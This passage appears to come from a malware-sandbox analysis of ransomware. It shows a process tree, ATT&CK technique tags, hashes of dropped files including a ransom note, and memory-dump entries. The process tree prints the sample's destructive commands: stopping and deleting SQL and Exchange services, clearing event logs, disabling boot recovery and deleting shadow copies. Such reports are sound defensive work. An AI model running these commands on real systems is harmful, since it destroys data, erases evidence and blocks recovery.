      4⤵
      PID:5672
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDiagnostics
        5⤵
        
        PID:5924
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeEdgeSync
      4⤵
      PID:6380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeEdgeSync
        5⤵
        
        PID:1340
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFastSearch
      4⤵
      PID:5204
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFastSearch
        5⤵
        
        PID:4196
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFrontEndTransport
      4⤵
      PID:4168
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5168
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHM
      4⤵
      PID:6820
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHM
        5⤵
        
        PID:8092
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SQL2008
      4⤵
      PID:6796
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL2008
        5⤵
        
        PID:7088
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHMRecovery
      4⤵
      PID:2868
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHMRecovery
        5⤵
        
        PID:6824
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeImap4
      4⤵
      PID:3932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeImap4
        5⤵
        
        PID:6800
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIMAP4BE
      4⤵
      PID:7284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIMAP4BE
        5⤵
        
        PID:4208
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIS
      4⤵
      PID:7028
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS
        5⤵
        
        PID:1968
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxAssistants
      4⤵
      PID:364
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
        5⤵
        
        PID:5520
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxReplication
      4⤵
      PID:2012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxReplication
        5⤵
        
        PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WEVTUTIL EL
    3⤵
    PID:6128
  - - C:\Windows\SysWOW64\wevtutil.exe
      WEVTUTIL EL
      4⤵
      PID:6320
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "AMSI/Debug"
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "AirSpaceChannel"
    3⤵
    - Clears Windows event logs
    PID:2104
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Analytic"
    3⤵
    PID:7108
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Application"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "DirectShowFilterGraph"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "DirectShowPluginControl"
    3⤵
    PID:6456
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Els_Hyphenation/Analytic"
    3⤵
    - Clears Windows event logs
    PID:6620
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "EndpointMapper"
    3⤵
    - Clears Windows event logs
    PID:6700
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "FirstUXPerf-Analytic"
    3⤵
    PID:6196
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "ForwardedEvents"
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "General Logging"
    3⤵
    PID:6908
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "HardwareEvents"
    3⤵
    PID:3400
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "IHM_DebugChannel"
    3⤵
    - Clears Windows event logs
    PID:7080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"
    3⤵
    PID:8080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"
    3⤵
    PID:7608
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"
    3⤵
    PID:7832
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"
    3⤵
    PID:6372
- C:\Users\Admin\AppData\Local\Temp\tmp.exe
  C:\Users\Admin\AppData\Local\Temp\tmp.exe
  2⤵
  - Checks computer location settings
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:4804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "MSSQLFDLauncher"
      4⤵
      Launches sc.exe
      PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    3⤵
    PID:4252
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3628

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPUserCodeV4
1⤵
PID:7308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
1⤵
PID:5732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
1⤵
PID:1696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDagMgmt
1⤵
PID:4444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AdobeARMservice
1⤵
PID:5760

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\3D Objects\FILE RECOVERY.txt

Filesize
1KB

MD5
74226253799506d43547899b84eeb767

SHA1
3799b5f988f0e289cbd1816026063510ce2371f2

SHA256
8ee98346462f6fe38b42a60ad485184ea49441c52eb38574be22f405bbb6630b

SHA512
d3ccce9bed07083d67a15adeb3d7c940fe4f4381dadfa3249763f10ea0bfc3c63891936bd999fcda44c28944f370a9543ff4044f60c8aa696471881ca1653bdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Iqegwkcaczlekill$-arab.bat

Filesize
53KB

MD5
b57545cb36ef6a19fdde4b2208ebb225

SHA1
1d319740835ff12562e04cc74545a047bba63031

SHA256
445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895

SHA512
3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vhfrgjds.vof.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2404-151-0x0000000005B20000-0x0000000005B3E000-memory.dmp

Filesize
120KB

Download
memory/2404-153-0x0000000006010000-0x000000000602A000-memory.dmp

Filesize
104KB

Download
memory/2404-138-0x0000000004C00000-0x0000000004C66000-memory.dmp

Filesize
408KB

Download
memory/2404-139-0x00000000054E0000-0x0000000005546000-memory.dmp

Filesize
408KB

Download
memory/2404-136-0x00000000021F0000-0x0000000002226000-memory.dmp

Filesize
216KB

Download
memory/2404-145-0x0000000002640000-0x0000000002650000-memory.dmp

Filesize
64KB

Download
memory/2404-150-0x0000000002640000-0x0000000002650000-memory.dmp

Filesize
64KB

Download
memory/2404-158-0x0000000002640000-0x0000000002650000-memory.dmp

Filesize
64KB

Download
memory/2404-152-0x0000000007380000-0x00000000079FA000-memory.dmp

Filesize
6.5MB

Download
memory/2404-137-0x0000000004DB0000-0x00000000053D8000-memory.dmp

Filesize
6.2MB

Download
memory/2404-154-0x0000000002640000-0x0000000002650000-memory.dmp

Filesize
64KB

Download
memory/2404-157-0x0000000002640000-0x0000000002650000-memory.dmp

Filesize
64KB

Download
memory/2404-156-0x0000000002640000-0x0000000002650000-memory.dmp

Filesize
64KB

Download
memory/4504-155-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4504-135-0x0000000006730000-0x0000000006752000-memory.dmp

Filesize
136KB

Download
memory/4504-134-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4504-133-0x00000000008C0000-0x00000000008DA000-memory.dmp

Filesize
104KB

Download
memory/4804-174-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-181-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-170-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-168-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-167-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-175-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-176-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-177-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-178-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-180-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-183-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-187-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-186-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-184-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-182-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-169-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-188-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-189-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-190-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-192-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-191-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-193-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-195-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-196-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-165-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-1257-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-11376-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-12092-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4804-12098-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download